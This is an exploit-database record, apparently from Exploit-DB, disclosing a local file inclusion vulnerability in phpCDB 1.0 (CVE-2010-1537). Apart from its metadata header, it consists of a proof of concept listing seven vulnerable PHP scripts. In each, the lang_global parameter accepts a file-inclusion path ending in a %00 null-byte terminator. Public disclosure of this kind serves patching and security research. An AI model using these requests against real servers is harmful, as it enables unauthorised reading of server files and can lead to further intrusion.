phpCDB 1.0 - Local File Inclusion
Author: cr4wl3r
type: webapps
platform: php
port:
date_added: 2010-02-26
date_updated:
verified: 1
codes: OSVDB-64111;CVE-2010-1537;OSVDB-64110;OSVDB-64109;OSVDB-64108;OSVDB-64107;OSVDB-64106;OSVDB-64105
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comphpcdb-1.0.tar.gz
##############################################################
##phpCDB <= 1.0 Local File Include Vulnerability
##############################################################
Author: cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg>
Download: http://sourceforge.net/projects/phpcdb/files/
##############################################################
PoC:
[phpcdb_path]/firstvisit.php?lang_global=[LFI%00]
[phpcdb_path]/newfolder.php?lang_global=[LFI%00]
[phpcdb_path]/showfolders.php?lang_global=[LFI%00]
[phpcdb_path]/newlang.php?lang_global=[LFI%00]
[phpcdb_path]/showinnerfolder.php?lang_global=[LFI%00]
[phpcdb_path]/writecode.php?lang_global=[LFI%00]
[phpcdb_path]/showcode.php?lang_global=[LFI%00]
##############################################################txt